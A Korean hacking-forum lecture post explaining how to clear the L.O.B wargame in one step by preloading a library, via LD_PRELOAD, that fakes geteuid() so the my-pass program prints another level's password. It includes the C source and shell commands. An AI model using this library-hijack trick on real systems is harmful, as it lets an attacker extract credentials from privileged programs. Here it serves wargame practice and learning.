1619,

1/81

해킹잘하고싶다

http://없음

(꼼수) L.O.B 한방에 클리어하기

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=8564 [복사]

필자가 LD_PRELOAD에 대해 연구하면서 알게 된 사실인데

my-pass 파일은 매우 취약하다.

LD_PRELOAD는 환경변수 중 하나이다.

프로세스를 실행하는 과정에서 라이브러리를 로딩할 때,

LD_PRELOAD(환경변수)가 설정이 되어있다면

해당 변수에 지정된 라이브러리를 먼저 로딩한다.

LD_PRELOAD 환경변수에 저장하는 여러가지 방법 중 쉘에 등록하여 사용하는 방법이 있다.

my-pass 파일은 geteuid를 해서 사용자의 euid에 맞는 패스워드를 출력해준다.

그런데 LD_PRELOAD라는 환경변수는 특정한 함수를 미리 등록해 둘 수 있다.

그렇다면 이 LD_PRELOAD란 무엇일까?

아래는 간단하게 구글링을 하여

해외 사이트에서 ld_preload에 대해 찾아본 글을 인용한 것이다.

========================================
.
.
.
Normally the Linux dynamic loader ld-linux (see ld-linux(8) man page) finds and loads the shared libraries needed by a program, prepare the program to run, and then run it. The shared libraries (shared objects) are loaded in whatever order the loader needs them in order to resolve symbols.
.
.
.

(해석)
.
.
.
보편적으로 리눅스 동적 로더는 프로그램에 필요한 공유 라이브러리들을
찾고 로드하며 실행할 프로그램을 준비한 다음 실행한다.
공유 라이브러리는 기호를 확인하기 위하여 로더가 필요한 순서대로 로드된다 그리고...
========================================

geteuid가 원하는 단계의 uid를 리턴하도록 LD_PRELOAD를 사용해서 조작할 수 있다.

그러면 my-pass는 조작된 geteuid의 결과에 따라 다른 아이디의 비밀번호를 뱉어낼 것이다.

---------------------
int geteuid(void);

int main(void)
{
        return geteuid();
}

int geteuid(void) {
    return 520;
}

--------------------

[gate@localhost gate]$ gcc -o geteuid -shared -fPIC geteuid.c
[gate@localhost gate]$ export LD_PRELOAD=./geteuid
[gate@localhost gate]$ my-pass

필자가 이것을 생각하는 도중,

int geteuid(void)
{
    return 520;
}

이렇게 쓰면 main함수, 즉 시작점이 없다고 에러를 뱉었다.

그렇다면 main함수에서 서브함수를 만든다음 520을 리턴하고 그 값을

main함수가 리턴하면 이랬던 저랬던 520을 리턴한다는 사실은 변함없지 않는가?

모든 프로그램은 시작점이 존재한다.

일반적인 C언어라면 main함수가 시작점이 되는데 (이것을 entry point라고도 한다)

이 시작점을 main이 아닌 다른 이름의 함수가 될 수 있을까?

라는 고찰을 하면서 강좌는 여기까지 마치겠다.

Hit : 3201 Date : 2023/01/14 03:09


해킹잘하고싶다	마지막 문단에 오해의 소지가 있네요. Windows API에선 WinMain이 시작점이라서 main함수와 이름이 다르긴 한데 "gcc같은 콘솔 C언어 프로그래밍에서 main함수 이름을 변경할 수 있을까?"가 고찰할 점입니다. 구글링을 해서 한번 알아봐야 되겠네요.	2023/01/15
잔데스	ㄷ	2024/03/16

[공지] 강좌를 올리실 때는 말머리를 달아주세요^ㅡ^ [29]

멍멍

02/27

21577

1618

realip_finder(asm ver)

해킹잘하고싶다

02/05

204

1617

realip_finder

해킹잘하고싶다

02/05

243

1616

리눅스 커널&운영체제 개론 (1)

해킹잘하고싶다

11/02

586

1615

stack overflow 사이트 번역

해킹잘하고싶다

07/09

1019

1614

[L.O.B 원정대] - troll

해킹잘하고싶다

07/08

1300

1613

[L.O.B 원정대] - orge

해킹잘하고싶다

07/07

1243

1612

[L.O.B 원정대] - darkelf

해킹잘하고싶다

07/07

1184

1611

[L.O.B 원정대] - wolfman

해킹잘하고싶다

07/03

1202

1610

[L.O.B 원정대] - orc

해킹잘하고싶다

07/03

1064

1609

[L.O.B 원정대] - goblin

해킹잘하고싶다

07/02

1207

1608

[L.O.B 원정대] - cobolt

해킹잘하고싶다

07/02

1427

1607

[L.O.B 원정대] - gremlin

해킹잘하고싶다

07/02

1119

1606

[L.O.B 원정대] - gate

해킹잘하고싶다

07/02

1108

1605

ARP 스푸핑 - Part.1 -

해킹잘하고싶다

04/20

1689

1604

http 스니퍼 구현

해킹잘하고싶다

04/20

1473

1603

pcap으로 패킷 스니퍼 구현하기

해킹잘하고싶다

04/20

1304

1602

해커스쿨 만화의 자동으로 스캔하는 프로그램

해킹잘하고싶다

02/18

1695

1601

시스템 콜 추적 확장판[2]

해킹잘하고싶다

01/19

1805

1600

간단한 시스템 콜 추적 프로그램 만들기

해킹잘하고싶다

01/18

1792

1 [2][3][4][5][6][7][8][9][10]..[81]